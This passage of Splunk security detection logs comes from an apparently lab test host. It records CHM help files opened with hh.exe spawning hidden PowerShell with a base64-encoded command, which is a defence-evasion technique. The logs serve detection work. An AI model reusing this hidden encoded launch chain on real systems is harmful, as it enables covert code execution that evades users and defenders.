1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_SHORTCUT_1.html\"", parent_process_id="668", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="1012", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm\"", parent_process_id="6064", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="8036", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm\"", parent_process_id="6064", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="8036", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:22", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:22", parent_process="\"C:\\Windows\\hh.exe\" \"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm\"", parent_process_id="7392", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="7400", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:22", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:22", parent_process="\"C:\\Windows\\hh.exe\" \"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm\"", parent_process_id="7392", process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA==", process_id="7400", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_id="6480", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_WSH_JSCRIPT_1.html\"", process_id="7824", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_id="6480", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_WSH_JSCRIPT_1.html\"", process_id="7824", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_id="6480", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_SHORTCUT_1.html\"", process_id="668", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_id="6480", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_SHORTCUT_1.html\"", process_id="668", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_id="6480", process="\"C:\\Windows\\hh.exe\" 